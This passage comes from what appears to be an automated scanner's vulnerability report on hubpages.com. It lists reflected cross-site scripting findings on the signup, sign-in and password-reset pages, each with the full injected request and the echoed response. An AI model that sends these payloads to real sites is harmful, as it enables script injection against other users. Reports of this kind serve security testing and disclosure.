Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:10 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/user8f280"><script>alert(1)</script>1667bd96a88/new/', 'Page not found'); return false;">
...[SNIP]...

1.90. http://hubpages.com/user/new/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /user/new/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16e18"><script>alert(1)</script>a2b143d7180 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/new16e18"><script>alert(1)</script>a2b143d7180/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:12 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/user/new16e18"><script>alert(1)</script>a2b143d7180/', 'Page not found'); return false;">
...[SNIP]...

1.91. http://hubpages.com/user/new/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /user/new/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efef0"><script>alert(1)</script>856b8cf17c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/new/?efef0"><script>alert(1)</script>856b8cf17c6=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:59 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 13342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/user/new/?efef0"><script>alert(1)</script>856b8cf17c6=1', 'HubPages New User Signup'); return false;">
...[SNIP]...

1.92. https://hubpages.com/signin/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e65d"><script>alert(1)</script>fa4c40e1602db8724 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin9e65d"><script>alert(1)</script>fa4c40e1602db8724/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:51 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin9e65d"><script>alert(1)</script>fa4c40e1602db8724/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In', 'Page not found'); return false;">
...[SNIP]...

1.93. https://hubpages.com/signin/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb436"><script>alert(1)</script>cb65b8029ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signinbb436"><script>alert(1)</script>cb65b8029ca/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:12 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signinbb436"><script>alert(1)</script>cb65b8029ca/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.', 'Page not found'); return false;">
...[SNIP]...

1.94. https://hubpages.com/signin/ [explain parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the explain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b61c0"><script>alert(1)</script>a1ea5dbbb55 was submitted in the explain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.b61c0"><script>alert(1)</script>a1ea5dbbb55 HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:50 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.b61c0%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea1ea5dbbb55; path=/; domain=.hubpages.com
Content-Length: 7959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.b61c0"><script>alert(1)</script>a1ea5dbbb55', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.95. https://hubpages.com/signin/ [explain parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the explain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23034"><script>alert(1)</script>656acdcaa3ebf7318 was submitted in the explain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.23034"><script>alert(1)</script>656acdcaa3ebf7318&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:26 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.23034%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E656acdcaa3ebf7318; path=/; domain=.hubpages.com
Content-Length: 8011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.23034"><script>alert(1)</script>656acdcaa3ebf7318&usshem123=&ussisma123=&sublogin=Sign+In', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.96. https://hubpages.com/signin/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d52d"><script>alert(1)</script>3ecb0670d8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&6d52d"><script>alert(1)</script>3ecb0670d8a=1 HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:08 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&6d52d"><script>alert(1)</script>3ecb0670d8a=1', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.97. https://hubpages.com/signin/ [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 567de"><script>alert(1)</script>49cf52049d9a5294c was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/?s=high567de"><script>alert(1)</script>49cf52049d9a5294c&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:15 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high567de"><script>alert(1)</script>49cf52049d9a5294c&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.98. https://hubpages.com/signin/ [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6bba"><script>alert(1)</script>4d65f9ca019 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=highc6bba"><script>alert(1)</script>4d65f9ca019&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=highc6bba"><script>alert(1)</script>4d65f9ca019&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.99. https://hubpages.com/signin/ [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd9a0"><script>alert(1)</script>dcbf5fa54aab84836 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsfd9a0"><script>alert(1)</script>dcbf5fa54aab84836&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:21 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstatsfd9a0%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Edcbf5fa54aab84836; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsfd9a0"><script>alert(1)</script>dcbf5fa54aab84836&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.100. https://hubpages.com/signin/ [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5c59"><script>alert(1)</script>1de617bf248 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsd5c59"><script>alert(1)</script>1de617bf248&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:37 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstatsd5c59%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E1de617bf248; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsd5c59"><script>alert(1)</script>1de617bf248&explain=view%20your%20account%20settings.', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.101. https://hubpages.com/signin/reset/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4ae0"><script>alert(1)</script>bfb058226eeddffe7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signinf4ae0"><script>alert(1)</script>bfb058226eeddffe7/reset/?email= HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/reset/
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:21 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signinf4ae0"><script>alert(1)</script>bfb058226eeddffe7/reset/?email=', 'Page not found'); return false;">
...[SNIP]...

1.102. https://hubpages.com/signin/reset/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9430"><script>alert(1)</script>d04be060a2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signinc9430"><script>alert(1)</script>d04be060a2d/reset/ HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
